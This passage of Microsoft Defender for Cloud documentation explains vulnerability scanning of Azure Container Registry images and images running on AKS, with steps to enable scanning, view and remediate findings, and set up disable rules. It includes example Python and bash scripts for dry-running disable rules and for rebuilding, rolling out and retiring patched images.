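    finding_ids: set = field(default_factory=set)
    cves: set = field(default_factory=set)
    categories: set = field(default_factory=set)
    security_check_text: set = field(default_factory=set)  # case-insensitive substrings
    cvss_less_than: Optional[float] = None
    minimum_severity: Optional[str] = None
    non_patchable: bool = False

    def reasons(self, f: Finding) -> list:
        """Names of the criteria this finding matches; empty means it stays active."""
        hit = []
        if f.finding_id in self.finding_ids:
            hit.append("finding id")
        if any(c in self.cves for c in f.cves):
            hit.append("cve")
        if f.category in self.categories:
            hit.append("category")
        check = f.security_check.lower()
        if any(t.lower() in check for t in self.security_check_text):
            hit.append("security check text")
        if self.cvss_less_than is not None and f.cvss < self.cvss_less_than:
            hit.append("cvss")
        if (self.minimum_severity is not None
                and SEVERITY_RANK[f.severity] < SEVERITY_RANK[self.minimum_severity]):
            hit.append("severity")
        if self.non_patchable and not f.patchable:
            hit.append("non-patchable")
        return hit


def apply_rule(rule: DisableRule, findings: Iterable[Finding]):
    """Split findings the way the Findings / Disabled findings tabs do.
    Returns (active findings, {finding_id: matched criteria})."""
    active, disabled = [], {}
    for f in findings:
        why = rule.reasons(f)
        if why:
            disabled[f.finding_id] = why
        else:
            active.append(f)
    return active, disabled


# Constructed sample findings. The tzdata row mirrors the finding shown in the
# article (ID 178369, High, patchable, CVSS 3.0 base score 5.3); the bash finding's
# CVSS and the 9000xx findings, including the CVE placeholder, are made up.
SAMPLE_FINDINGS = [
    Finding("178369", "Debian Security Update for tzdata", "Debian", "High", 5.3, True),
    Finding("372268", "GNU Bash Privilege Escalation Vulnerability", "Local", "High", 7.8, False),
    Finding("900001", "Debian Security Update for libexample", "Debian", "Medium", 6.1, True),
    Finding("900002", "CentOS Security Update for sudo", "CentOS", "Low", 3.3, True,
            ("CVE-0000-0001",)),
]


if __name__ == "__main__":
    # One of the typical scenarios above: hide findings with a CVSS score below 6.5.
    rule = DisableRule(cvss_less_than=6.5)
    active, disabled = apply_rule(rule, SAMPLE_FINDINGS)
    print("active:", [f.finding_id for f in active])
    print("disabled:", disabled)
```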


View vulnerabilities for images running on your 
AKS clusters 


Defender for Cloud gives its customers the ability to prioritize the remediation of
vulnerabilities in images that are currently being used within their environment using
the Running container images should have vulnerability findings resolved (powered by
Qualys) recommendation.


To provide the findings for the recommendation, Defender for Cloud collects the 
inventory of your running containers that are collected by the agentless discovery for 
Kubernetes or the Defender agent. Defender for Cloud correlates that inventory with the 
vulnerability assessment scan of images that are stored in ACR. The recommendation 
shows your running containers with the vulnerabilities associated with the images that 
are used by each container and provides vulnerability reports and remediation steps. 


While Defender agent provides pod inventory every hour, the agentless discovery for 
Kubernetes provides an update every six hours. If both extensions are enabled, the 
newest information is used. 


[Screenshot: Recommendations page in Microsoft Defender for Cloud filtered to the
"Running container images should have vulnerability findings resolved"
recommendation]


Next steps


• Learn more about the Defender for Cloud Defender plans.


• Check out common questions about Defender for Containers.
Vulnerability assessments for Azure with
Microsoft Defender Vulnerability
Management


Article • 09/10/2023


Vulnerability assessment for Azure, powered by Microsoft Defender Vulnerability
Management (MDVM), is an out-of-box solution that empowers security teams to easily
discover and remediate vulnerabilities in Linux container images, with zero configuration
for onboarding, and without deployment of any agents.


Note


This feature supports scanning of images in the Azure Container Registry (ACR) 
only. Images that are stored in other container registries should be imported into 
ACR for coverage. Learn how to import container images to a container registry. 


In every subscription where this capability is enabled, all images stored in ACR (existing 
and new) are automatically scanned for vulnerabilities without any extra configuration of 
users or registries. Recommendations with vulnerability reports are provided for all 
images in ACR as well as images that are currently running in AKS that were pulled from 
an ACR registry. Images are scanned shortly after being added to a registry, and 
rescanned for new vulnerabilities once every 24 hours. 


Container vulnerability assessment powered by MDVM (Microsoft Defender Vulnerability 
Management) has the following capabilities: 


• Scanning OS packages - container vulnerability assessment has the ability to scan
vulnerabilities in packages installed by the OS package manager in Linux. See the
full list of the supported OS and their versions.


• Language specific packages — support for language specific packages and files,
and their dependencies installed or copied without the OS package manager. See
the complete list of supported languages.


• Image scanning in Azure Private Link - Azure container vulnerability assessment
provides the ability to scan images in container registries that are accessible via
Azure Private Links. This capability requires access to trusted services and
authentication with the registry. Learn how to allow access by trusted services.


• Exploitability information - Each vulnerability report is searched through
exploitability databases to assist our customers with determining actual risk
associated with each reported vulnerability.


• Reporting - Container Vulnerability Assessment for Azure powered by Microsoft
Defender Vulnerability Management (MDVM) provides vulnerability reports using the
following recommendations:

  Recommendation: Container registry images should have vulnerability findings
  resolved (powered by Microsoft Defender Vulnerability Management)-Preview
  Description: Container image vulnerability assessment scans your registry for
  commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report
  for each image. Resolving vulnerabilities can greatly improve your security posture,
  ensuring images are safe to use prior to deployment.
  Assessment key: c0b7cfc6-3172-465a-b378-53c7ff2cc0d5

  Recommendation: Running container images should have vulnerability findings
  resolved (powered by Microsoft Defender Vulnerability Management)
  Description: Container image vulnerability assessment scans your registry for
  commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report
  for each image. This recommendation provides visibility to vulnerable images
  currently running in your Kubernetes clusters. Remediating vulnerabilities in
  container images that are currently running is key to improving your security
  posture, significantly reducing the attack surface for your containerized workloads.
  Assessment key: c609cf0f-71ab-41e9-a3c6-9a1f7fe1b8d5


• Query vulnerability information via the Azure Resource Graph - Ability to query
vulnerability information via the Azure Resource Graph. Learn how to query
recommendations via ARG.


• Query scan results via REST API - Learn how to query scan results via REST API.


• Support for exemptions - Learn how to create exemption rules for a management
group, resource group, or subscription.


• Support for disabling vulnerabilities - Learn how to disable vulnerabilities on
images.


Scan triggers 


The triggers for an image scan are: 


• One-time triggering:

  ◦ each image pushed or imported to a container registry is scanned after being
    pushed or imported to a registry. In most cases, the scan is completed within a
    few minutes, but sometimes it may take up to an hour.

  ◦ [Preview] each image pulled from a registry is triggered to be scanned within 24
    hours.


Note


While Container vulnerability assessment powered by MDVM is generally
available for Defender CSPM, scan-on-push and scan-on-pull are currently in
public preview.


• Continuous rescan triggering — Continuous rescan is required to ensure images
that have been previously scanned for vulnerabilities are rescanned to update their
vulnerability reports in case a new vulnerability is published.

  ◦ Re-scan is performed once a day for:
    ◦ images pushed in the last 90 days.
    ◦ [Preview] images pulled in the last 30 days.
    ◦ images currently running on the Kubernetes clusters monitored by Defender
      for Cloud (either via agentless discovery and visibility for Kubernetes or the
      Defender agent).


Note


While Container vulnerability assessment powered by MDVM is generally
available for Defender CSPM, scanning images pulled in the last 30 days is
currently in public preview.


How does image scanning work? 


A detailed description of the scan process is described as follows: 


• When you enable the container vulnerability assessment for Azure powered by
MDVM, you authorize Defender for Cloud to scan container images in your Azure
Container registries.


• Defender for Cloud automatically discovers all container registries, repositories
and images (created before or after enabling this capability).


• Defender for Cloud receives notifications whenever a new image is pushed to an
Azure Container Registry. The new image is then immediately added to the catalog
of images Defender for Cloud maintains, and an action is queued to scan the image
immediately.


• Once a day, or when an image is pushed to a registry:

  ◦ All newly discovered images are pulled, and an inventory is created for each
    image. Image inventory is kept to avoid further image pulls, unless required by
    new scanner capabilities.

  ◦ Using the inventory, vulnerability reports are generated for new images, and
    updated for images previously scanned which were either pushed in the last 90
    days to a registry, or are currently running. To determine if an image is currently
    running, Defender for Cloud uses both agentless discovery and visibility within
    Kubernetes components and inventory collected via the Defender agent
    running on AKS nodes.

  ◦ Vulnerability reports for container images are provided as a recommendation.


• For customers using either agentless discovery and visibility within Kubernetes
components or inventory collected via the Defender agent running on AKS nodes,
Defender for Cloud also creates a recommendation for remediating
vulnerabilities for vulnerable images running on an AKS cluster.


Note


For Defender for Container Registries (deprecated), images are scanned once on 
push, on pull, and rescanned only once a week. 


If I remove an image from my registry, how
long before vulnerability reports on that
image are removed?


Azure Container Registries notifies Defender for Cloud when images are deleted, and 
removes the vulnerability assessment for deleted images within one hour. In some rare 
cases, Defender for Cloud may not be notified on the deletion, and deletion of 
associated vulnerabilities in such cases may take up to three days. 


Next steps 


• Learn more about the Defender for Cloud Defender plans.
• Check out common questions about Defender for Containers.


Enable vulnerability assessment in Azure
powered by MDVM


Article • 09/04/2023


Vulnerability assessment for Azure, powered by Microsoft Defender Vulnerability
Management (MDVM), is an out-of-box solution that empowers security teams to easily
discover and remediate vulnerabilities in Linux container images, with zero configuration
for onboarding, and without deployment of any agents.


How to enable vulnerability assessment in 
Azure powered by MDVM 


1. Before starting, verify that the subscription is onboarded to Defender CSPM, 
Defender for Containers or Defender for Container Registries. 


2. In the Azure portal, navigate to the Defender for Cloud's Environment Settings 
page. 


3. Select the subscription that's onboarded to one of the above plans. Then select
Settings.


4. Ensure the Container registries vulnerability assessments extension is toggled to 
On. 


5. Select Continue. 


[Screenshot: Settings & monitoring page for Defender CSPM listing the Agentless
scanning for machines and Agentless discovery for Kubernetes (preview) components
with their configuration status]


6. Select Save. 


A notification message pops up in the top right corner that will verify that the settings 
were saved successfully. 


How to enable runtime coverage 


• For Defender CSPM, use agentless discovery for Kubernetes. For more information,
see Onboard agentless container posture in Defender CSPM.

• For Defender for Containers, use agentless discovery for Kubernetes or use the
Defender agent. For more information, see Enable the plan.

• For Defender for Container Registries, there is no runtime coverage.


Next steps 


• Learn more about Trusted Access.

• Learn how to view and remediate vulnerability assessment findings for registry
images and running images.

• Learn how to create an exemption for a resource or subscription.

• Learn more about Cloud Security Posture Management.


View and remediate vulnerabilities for 
registry images 


Article • 07/31/2023


Defender for Cloud gives its customers the ability to remediate vulnerabilities in
container images while still stored in the registry by using the Container registry images
should have vulnerability findings resolved (powered by MDVM) recommendation.


Within the recommendation, resources are grouped into tabs: 


• Healthy resources — relevant resources, which either aren't impacted or on which
you've already remediated the issue.

• Unhealthy resources — resources that are still impacted by the identified issue.

• Not applicable resources — resources for which the recommendation can't give a
definitive answer. The not applicable tab also includes reasons for each resource.


If you are using Defender CSPM, first review and remediate vulnerabilities exposed via
attack paths, as they pose the greatest risk to your security posture. Then view and
remediate vulnerabilities for running images, and finally use the procedures described
here to view, remediate, prioritize, and monitor vulnerabilities in your registry images.


View vulnerabilities on a specific container 
registry 


1. Open the Recommendations page, using the > arrow to open the sublevels. If
issues were found, you'll see the recommendation Container registry images
should have vulnerability findings resolved (powered by MDVM). Select the
recommendation.


[Screenshot: Recommendations page in Microsoft Defender for Cloud with the Azure,
AWS and GCP environments selected]


2. The recommendation details page opens with additional information. This
information includes the list of registries with vulnerable images ("affected
resources") and the remediation steps. Select the affected registry.


[Screenshot: recommendation details page showing Severity, Freshness interval (24
hours), Unhealthy registries, Total vulnerable images, Total vulnerabilities by
severity, and the Affected resources list of unhealthy registries]


3. This opens the registry details with a list of repositories in it that have vulnerable 
images. Select the affected repository to see the images in it that are vulnerable. 


[Screenshot: registry details page for contosoregistry01 showing total vulnerabilities
by severity and the Unhealthy repositories tab]


4. The repository details page opens. It lists all vulnerable images on that repository
with distribution of the severity of vulnerabilities per image. Select the unhealthy
image to see the vulnerabilities.


[Screenshot: repository details page for mdc-contoso-demo/vulnerable-image in
contosoregistry01 listing the unhealthy image with its scan report time, OS type, tags
and artifact media type]


5. The list of vulnerabilities for the selected image opens. To learn more about a
finding, select the finding.


[Screenshot: image security health page for image 271282ecaa77 (Debian 8) in
contosoregistry01 showing the image URI, digest, tags and OS, and the findings by
severity, CVE, fix status, package type, vendor, installed version, package name and
fixed version]


6. The vulnerability details pane opens. It includes a detailed description of the issue, links to external resources to help mitigate the threat, the affected resources, and the software version that resolves the vulnerability.


[Screenshot: details pane for CVE-2019-11047 on image 271282ecaa77. Other details: package type os, vendor debian, package name php5, installed version 5.6.30+dfsg-0+deb8u1, fixed version 5.6.40+dfsg-0+deb8u8; CVSS vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H (truncated in the screenshot); other references: https://nvd.nist.gov/vuln/detail/CVE-2019-11047; Remediation/patch details: "Create new image with updated package php5 with version 5.6.40+dfsg-0+deb8u8 or higher."; collapsible Exploitability, CPE, Evidence and Affected resources sections, the latter listing digest 271282ecaa77, OS linux, vendor debian, repository mdc-contoso-demo. Behind the pane, the image's finding list shows the Critical entries CVE-2019-11047, CVE-2019-9641, CVE-2019-9640 and CVE-2019-9639, all FixAvailable, vendor debian]


View images affected by a specific vulnerability 


1. Open the Recommendations page. If issues were found, you'll see the recommendation Container registry images should have vulnerability findings resolved (powered by MDVM). Select the recommendation.


[Screenshot: Microsoft Defender for Cloud | Recommendations, subscription CyberSecSOC. Secure score 35%, 176/249 active recommendations, Azure/AWS/GCP filters. The Remediate vulnerabilities control (max score 6, +4%, overdue, 61 of 206 resources) is expanded to show Machines should have a vulnerability assessment solution, Machines should have vulnerability findings resolved, EC2 instances should have vulnerability findings resolved, and the Kubernetes recommendations]


2. The recommendation details page opens with additional information, including the list of vulnerabilities affecting the images. Select the specific vulnerability.


[Screenshot: recommendation details for Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management). Toolbar: Exempt, Disable rule, View policy definition, Open query. Severity High, freshness interval 24 hours, 1 unhealthy registry (contosoregistry01, subscription CyberSecSOC, 16 images), 16 of 16 scanned images vulnerable, 454 total vulnerabilities (Critical 38, Medium 193, Low 32, Unknown 0). Vulnerabilities table with Active / Disabled tabs and columns Severity, CVE, Applies to; for example Critical CVE-2017-1000158 on 5 of 16 scanned images]


3. The vulnerability finding details pane opens. It includes a detailed description of the vulnerability, the images affected by it, links to external resources to help mitigate the threat, the affected resources, and the software version that resolves the vulnerability.


[Screenshot: details pane for CVE-2021-3711, opened from the recommendation's Vulnerabilities list (Critical entries: CVE-2021-3711 on 8 of 16 scanned images, CVE-2022-28391 on 7, CVE-2021-36159 on 6, CVE-2017-1000158 on 5, CVE-2016-0718 on 5). Description: "This vulnerability affects the following vendors: Openssl, Debian, Netapp, Oracle, Tenable, Microsoft, Ubuntu, Suse, Alpine. To view more details about this vulnerability please visit the vendor website." General information: date published 8/24/2021, fix status FixAvailable, severity Critical, CVSS score 9.8, CVSS version 3.0; collapsible Additional information and Exploitability sections; Affected resources table (Digest, OS, Vendor, Repository, Registry host) listing linux/ubuntu and linux/alpine images from the k8s-goat repositories in contosoregistry01]


Use these steps to remediate each of the affected images found either in a specific registry or for a specific vulnerability:

1. Follow the steps in the remediation section of the recommendation pane.

2. When you've completed the steps required to remediate the security issue, replace each affected image in your registry, or replace each affected image for a specific vulnerability:

   a. Build a new image (including updates for each of the packages) that resolves the vulnerability according to the remediation details.

   b. Push the updated image to trigger a scan and delete the old image. It may take up to 24 hours for the previous image to be removed from the results, and for the new image to be included in the results.

3. Check the Recommendations page for the recommendation Container registry images should have vulnerability findings resolved (powered by MDVM). If the recommendation still appears and the image you've handled still appears in the list of vulnerable images, check the remediation steps again.


Next steps 


• Learn how to view and remediate vulnerabilities for images running on Azure Kubernetes clusters.
• Learn more about the Defender for Cloud Defender plans.


View and remediate vulnerabilities for images running on your AKS clusters

Article · 09/06/2023


Defender for Cloud lets you prioritize the remediation of vulnerabilities in images that are currently in use in your environment, using the Running container images should have vulnerability findings resolved recommendation.


To provide findings for the recommendation, Defender for Cloud uses agentless 
discovery for Kubernetes or the Defender agent to create a full inventory of your 
Kubernetes clusters and their workloads and correlates that inventory with the 
vulnerability reports created for your registry images. The recommendation shows your 
running containers with the vulnerabilities associated with the images that are used by 
each container and remediation steps. 


Defender for Cloud presents the findings and related information as recommendations, 
including related information such as remediation steps and relevant CVEs. You can view 
the identified vulnerabilities for one or more subscriptions, or for a specific resource. 


Within each recommendation, resources are grouped into tabs: 


• Healthy resources: relevant resources which either aren't impacted or on which you've already remediated the issue.

• Unhealthy resources: resources that are still impacted by the identified issue.

• Not applicable resources: resources for which the recommendation can't give a definitive answer. The Not applicable tab also includes the reason for each resource.


If you are using Defender CSPM, first review and remediate vulnerabilities exposed via attack paths, as they pose the greatest risk to your security posture. Then use the following procedures to view, remediate, prioritize, and monitor vulnerabilities for your containers.


View vulnerabilities on a specific cluster 
To view vulnerabilities for a specific cluster, do the following: 


1. Open the Recommendations page, using the > arrow to open the sub-levels. If issues were found, you'll see the recommendation Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management). Select the recommendation.


[Screenshot: Microsoft Defender for Cloud | Recommendations, subscription CyberSecSOC; secure score 39%, 53/83 active recommendations, 18 attack paths; filters Azure, AWS, GCP, GitHub, GitLab, AzureDevOps. The Remediate vulnerabilities control (max score 6, current score 1.64, potential increase +8%) is expanded to show: Container registry images should have vulnerability findings resolved (powered by Qualys); Container registry images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management); Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed; Container images should be deployed from trusted registries only; Running container images should have vulnerability findings resolved (powered by Qualys); Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management)]


2. The recommendation details page opens, showing the list of Kubernetes clusters ("affected resources") categorized as healthy, unhealthy, and not applicable, based on the images used by your workloads. Select the cluster for which you want to remediate vulnerabilities.


[Screenshot: recommendation details for Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management). Toolbar: Exempt, View policy definition, Open query. Severity High, freshness interval 30 min. Description: "Container image vulnerability assessment scans your registry for commonly known vulnerabilities (CVEs) and provides a detailed vulnerability report for each image. This recommendation provides visibility to vulnerable images currently running in your Kubernetes clusters. Remediating vulnerabilities in container images that are currently running is key to improving your security posture, significantly reducing the attack surface for your containerized workloads." Affected resources tabs: Unhealthy resources (1), Healthy resources (0), Not applicable resources (1); columns Name, Subscription (CyberSecSOC), Owner (demo@demo.com), Due date (7/21/2023), Status (On time), Last change]


3. The cluster details page opens. It lists all currently running containers, categorized into three tabs based on the vulnerability assessments of the images used by those containers. Select the specific container you want to explore.


[Screenshot: cluster details for contoso-aks-prd: 450 total vulnerabilities (Critical 38, High 183, Medium 193, Low 31, Unknown 0), freshness interval 24 hours, inventory source Agentless; tabs Unhealthy images (8), Healthy images (6), Not applicable images (20); columns Name (contosoregistry01.azurecr.io/...), Last scan (7/4/2023, 11:10 AM), OS type (linux), Container name (system-monitor, hello-kubernetes-vuln...), Pod name, Controller name (release-3-66cffc5457), Controller type (ReplicaSet), Namespace (default, mdc-contoso-demo), Vulnerabilities]


4. The image details pane opens with the list of vulnerabilities in the container's image. Select a vulnerability to see its details and the steps to resolve it.


[Screenshot: image details for a3aae97c994c (under contoso-aks-prd). Essentials: image URI contosoregistry01.azurecr.io/k8s-goat-system-monitor@sha256:a3aae97c994ca36c1c7f1cd4935..., digest sha256:a3aae97c994ca36c1c7f1cd49354206229685b725c4c1c0a23b823599b2211bf, tag latest, OS Linux, OS distribution Ubuntu Linux 18.04; vulnerabilities by severity shown with freshness interval 24 hours and inventory source Agentless; tabs Active Vulnerabilities (432), Disabled Vulnerabilities (0), Active Containers (1); columns Severity, CVE, Patch available, Package type, Vendor, Installed version, Package name, Fixed version. Example rows: Critical CVE-2020-10543 and CVE-2020-10878 (patch available, os, ubuntu, perl-base 5.26.1-6ubuntu0.3, fixed 5.26.1-6ubuntu0.5); Critical CVE-2021-3711 (patch available, os, ubuntu, openssl 1.1.1-1ubuntu2.1~18.0..., fixed 1.1.1-1ubuntu2.1~18.04.13)]


View container images affected by a specific vulnerability


To view findings for a specific vulnerability, do the following: 


1. Open the Recommendations page, using the > arrow to open the sub-levels. If issues were found, you'll see the recommendation Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management). Select the recommendation.


[Screenshot: Microsoft Defender for Cloud | Recommendations, subscription CyberSecSOC, with the Remediate vulnerabilities control (max score 6, current score 1.64, +8%) expanded to the same container recommendations as in the previous procedure, ending with Running container images should have vulnerability findings resolved (powered by Qualys) and (powered by Microsoft Defender Vulnerability Management)]


2. The recommendation details page opens with additional information, including the list of vulnerabilities affecting the clusters. Select the specific vulnerability.


[Screenshot: recommendation details for Running container images should have vulnerability findings resolved (powered by Microsoft Defender Vulnerability Management), with the Exempt, Disable rule, View policy definition and Open query actions and the Severity, Unhealthy clusters and Total vulnerabilities summary]


3. The vulnerability details pane opens. This pane includes a detailed description of 
the vulnerability, images affected by that vulnerability, and links to external 
resources to help mitigate the threats, affected resources, and information on the 
software version that contributes to resolving the vulnerability. 


[Screenshot: details pane for CVE-2021-3711 opened from the running-images recommendation (severity High, freshness interval 24 hours, 1/2 unhealthy clusters, out of 14 scanned images). Description as in the registry view (vendors Openssl, Debian, Netapp, Oracle, Tenable, Microsoft, Ubuntu, Suse, ...). General information: date published 8/24/2021, last modified 6/13/2023, fix status FixAvailable, severity Critical, CVSS score 9.8, CVSS version 3.0; sections Additional information, Exploitability, Affected resources; the recommendation's own Vulnerabilities list (Active / Disabled) is visible behind the pane]


Remediate vulnerabilities 


Use these steps to remediate each of the affected images found either in a specific 
cluster or for a specific vulnerability: 


1. Follow the steps in the remediation section of the recommendation pane. 

2. When you've completed the steps required to remediate the security issue, replace 
each affected image in your cluster, or replace each affected image for a specific 
vulnerability: 

a. Build a new image (including updates for each of the packages) that resolves 
the vulnerability according to the remediation details. 

b. Push the updated image to trigger a scan and delete the old image. It may take 
up to 24 hours for the previous image to be removed from the results, and for 
the new image to be included in the results. 


c. Use the new image across all vulnerable workloads. 


3. Check the Recommendations page for the recommendation Running container images should have vulnerability findings resolved.

4. If the recommendation still appears and the image you've handled still appears in the list of vulnerable images, check the remediation steps again.
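The rebuild, push, roll out and retire loop that both remediation procedures describe (registry images in the previous article, running images here with the extra rollout step), written up as an added example script; it is not tooling shipped with Defender for Cloud. It assumes docker, kubectl and the Azure CLI are installed and signed in (az login, az acr login), that the image is apt-based, and that the registry is an Azure Container Registry. The registry, repository, tag, package, fixed version and old digest are arguments you supply from the finding's details pane.

```bash
#!/usr/bin/env bash
# Rebuild a vulnerable image with the fixed package pinned, push it so the
# registry scans the new digest, roll workloads over, then delete the old digest.
# Added example: assumes docker, kubectl and az are installed and logged in.
set -eu

# apt pin for the package and version named in the finding's "Fixed version" column.
pin_spec() {
  # usage: pin_spec <package> <fixed-version>   -> "php5=5.6.40+dfsg-0+deb8u8"
  printf '%s=%s' "$1" "$2"
}

# Dockerfile that layers the pinned fix on top of an existing image reference.
# A rebuild is what produces a new digest; patching inside a running container
# changes nothing the scanner can see, and the old digest keeps its findings.
fix_dockerfile() {
  # usage: fix_dockerfile <base-image-ref> <pin-spec>...
  local base="$1"; shift
  printf 'FROM %s\n' "$base"
  printf 'RUN apt-get update \\\n && apt-get install -y --no-install-recommends %s \\\n && rm -rf /var/lib/apt/lists/*\n' "$*"
}

# Build under a fresh tag, push (this triggers the registry scan), and print the
# digest the registry assigned, which is what the recommendation will list next.
build_and_push() {
  # usage: build_and_push <registry> <repo> <tag> <dockerfile>
  local registry="$1" repo="$2" tag="$3" dockerfile="$4"
  local ref="${registry}.azurecr.io/${repo}:${tag}"
  docker build --pull -f "$dockerfile" -t "$ref" . >&2
  docker push "$ref" >&2
  docker inspect --format '{{index .RepoDigests 0}}' "$ref" | cut -d@ -f2
}

# Running-images step 2c: point each workload at the new digest and wait for it.
rollout() {
  # usage: rollout <namespace> <deployment> <container> <image-ref@digest>
  kubectl -n "$1" set image "deployment/$2" "$3=$4"
  kubectl -n "$1" rollout status "deployment/$2"
}

# Delete the old digest so nothing can pull it again; results refresh within ~24h.
retire_old() {
  # usage: retire_old <registry> <repo> <old-digest>
  az acr repository delete --name "$1" --image "$2@$3" --yes
}

# Example: ./remediate.sh contosoregistry01 mdc-contoso-demo/vulnerable-image fixed-1 \
#   php5 5.6.40+dfsg-0+deb8u8 sha256:271282ecaa7728ceb618515e389ce92bc884ee24f03ba65bf134d85f72286279
# Only runs when all six arguments are supplied; call rollout for each workload
# that referenced the old digest before retiring it.
if [ "$#" -ge 6 ]; then
  registry="$1" repo="$2" tag="$3" pkg="$4" fixed="$5" old_digest="$6"
  fix_dockerfile "${registry}.azurecr.io/${repo}@${old_digest}" "$(pin_spec "$pkg" "$fixed")" > Dockerfile.fix
  new_digest="$(build_and_push "$registry" "$repo" "$tag" Dockerfile.fix)"
  echo "new image: ${registry}.azurecr.io/${repo}@${new_digest}"
  retire_old "$registry" "$repo" "$old_digest"
fi
```

Pin the exact version from the Fixed version column (or a later one). Layering the fix on the old digest is the quickest path; when the fix comes from the distribution, bump the base image in the original Dockerfile as well, so the next routine rebuild does not reintroduce the vulnerable package. Delete the old digest only after every workload has rolled over, otherwise the running-images recommendation keeps reporting containers that still run it.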


Next steps 


• Learn how to view and remediate vulnerabilities for registry images.
• Learn more about the Defender for Cloud Defender plans.


Create exemptions and disable vulnerability assessment findings on container registry images and running images

Article · 07/31/2023


Note

You can customize your vulnerability assessment experience by exempting management groups, subscriptions, or specific resources from your secure score. Learn how to create an exemption for a resource or subscription.


If you have an organizational need to ignore a finding, rather than remediate it, you can optionally disable it. Disabled findings don't affect 
your secure score or generate unwanted noise. 


When a finding matches the criteria you've defined in your disable rules, it doesn't appear in the list of findings. Typical scenario examples 
include: 


• Disable findings with severity below medium

• Disable findings for images that the vendor will not fix


Important


To create a rule, you need permissions to edit a policy in Azure Policy. Learn more in Azure RBAC permissions in Azure Policy. 


You can use a combination of any of the following criteria: 


• CVE: Enter the CVEs of the findings you want to exclude. Ensure the CVEs are valid. Separate multiple CVEs with a semicolon. For example, CVE-2020-1347; CVE-2020-1346.

• Image digest: Specify images for which vulnerabilities should be excluded based on the image digest. Separate multiple digests with a semicolon, for example: sha256:9b920e938111710c2768b31699aac9d1ae80ab6284454e8a9ff42e887fa1db31;sha256:ab0ab32f75988da9b146de7a3589c47e919393ae51bbf2d8a0d55dd92542451c

• OS version: Specify images for which vulnerabilities should be excluded based on the image OS. Separate multiple versions with a semicolon, for example: ubuntu_linux_20.04;alpine_3.17

• Minimum severity: Select low, medium, high, or critical to exclude vulnerabilities less than and equal to the specified severity level.

• Fix status: Select the option to exclude vulnerabilities based on their fix status.


Disable rules apply per recommendation. For example, to disable CVE-2017-17512 both on the registry images and on the running images, the disable rule has to be configured in both places.
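To see which findings a rule would hide before applying it, the following Python models the five criteria above and the per-recommendation scope as a local dry run. It is an added example, not Defender for Cloud code: the Finding and DisableRule types are local models of the portal fields, SAMPLE_FINDINGS is constructed data (CVE ids and digests are the ones quoted in this article, the rest is illustrative), and the OR-combination of criteria follows the wording of the Disable rule pane, "Disable findings that match any of the following criteria", which you should confirm against your own tenant.

```python
"""Dry-run a container vulnerability-assessment disable rule against findings.

Added example, not Defender for Cloud code. Finding and DisableRule are local
models of the portal fields; SAMPLE_FINDINGS is constructed data.
"""
import re
from dataclasses import dataclass
from typing import Optional

SEVERITY_RANK = {"Low": 1, "Medium": 2, "High": 3, "Critical": 4}
FIX_STATUSES = {"Unknown", "FixAvailable", "NoFixAvailable", "Scheduled", "WontFix"}
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")
DIGEST_RE = re.compile(r"^sha256:[0-9a-f]{64}$")


@dataclass(frozen=True)
class Finding:
    recommendation: str   # "registry" or "running": each recommendation has its own rules
    cve: str
    digest: str
    os_version: str       # portal format, for example "ubuntu_linux_20.04"
    severity: str         # Low, Medium, High, Critical or Unknown
    fix_status: str


@dataclass(frozen=True)
class DisableRule:
    recommendation: str
    cves: frozenset = frozenset()
    digests: frozenset = frozenset()
    os_versions: frozenset = frozenset()
    minimum_severity: Optional[str] = None
    fix_status: Optional[str] = None
    justification: str = ""

    @staticmethod
    def _split(text: str) -> frozenset:
        """Portal fields are semicolon separated; tolerate stray spaces."""
        return frozenset(t.strip() for t in text.split(";") if t.strip())

    @classmethod
    def from_portal(cls, recommendation, cves="", digests="", os_versions="",
                    minimum_severity=None, fix_status=None, justification=""):
        """Parse the portal fields and reject values the rule could never match."""
        rule = cls(recommendation, cls._split(cves),
                   frozenset(d.lower() for d in cls._split(digests)),
                   frozenset(o.lower() for o in cls._split(os_versions)),
                   minimum_severity, fix_status, justification)
        bad = [c for c in rule.cves if not CVE_RE.match(c)]
        bad += [d for d in rule.digests if not DIGEST_RE.match(d)]
        if bad:
            raise ValueError(f"malformed criteria: {bad}")
        if minimum_severity is not None and minimum_severity not in SEVERITY_RANK:
            raise ValueError(f"unknown severity: {minimum_severity}")
        if fix_status is not None and fix_status not in FIX_STATUSES:
            raise ValueError(f"unknown fix status: {fix_status}")
        return rule

    def matches(self, f: Finding) -> bool:
        """True if this rule hides the finding. Criteria are OR-ed, following the
        pane text "Disable findings that match any of the following criteria"
        (assumption: confirm in your tenant)."""
        if f.recommendation != self.recommendation:
            return False  # rules apply per recommendation
        if f.cve in self.cves or f.digest.lower() in self.digests \
                or f.os_version.lower() in self.os_versions:
            return True
        # Minimum severity hides findings "less than and equal to" the level.
        # Unknown is not ranked, so this criterion never hides it (assumption).
        if self.minimum_severity and f.severity in SEVERITY_RANK \
                and SEVERITY_RANK[f.severity] <= SEVERITY_RANK[self.minimum_severity]:
            return True
        return self.fix_status is not None and f.fix_status == self.fix_status


def apply_rules(findings, rules):
    """Return (active findings, list of (finding, rule) pairs that were hidden)."""
    active, hidden = [], []
    for f in findings:
        rule = next((r for r in rules if r.matches(f)), None)
        if rule is None:
            active.append(f)
        else:
            hidden.append((f, rule))
    return active, hidden


DIGEST_A = "sha256:9b920e938111710c2768b31699aac9d1ae80ab6284454e8a9ff42e887fa1db31"
DIGEST_B = "sha256:ab0ab32f75988da9b146de7a3589c47e919393ae51bbf2d8a0d55dd92542451c"
# Constructed sample: CVE ids and digests come from this article, the rest is illustrative.
SAMPLE_FINDINGS = [
    Finding("registry", "CVE-2017-17512", DIGEST_A, "ubuntu_linux_20.04", "Critical", "WontFix"),
    Finding("running", "CVE-2017-17512", DIGEST_A, "ubuntu_linux_20.04", "Critical", "WontFix"),
    Finding("registry", "CVE-2020-1347", DIGEST_B, "alpine_3.17", "Low", "FixAvailable"),
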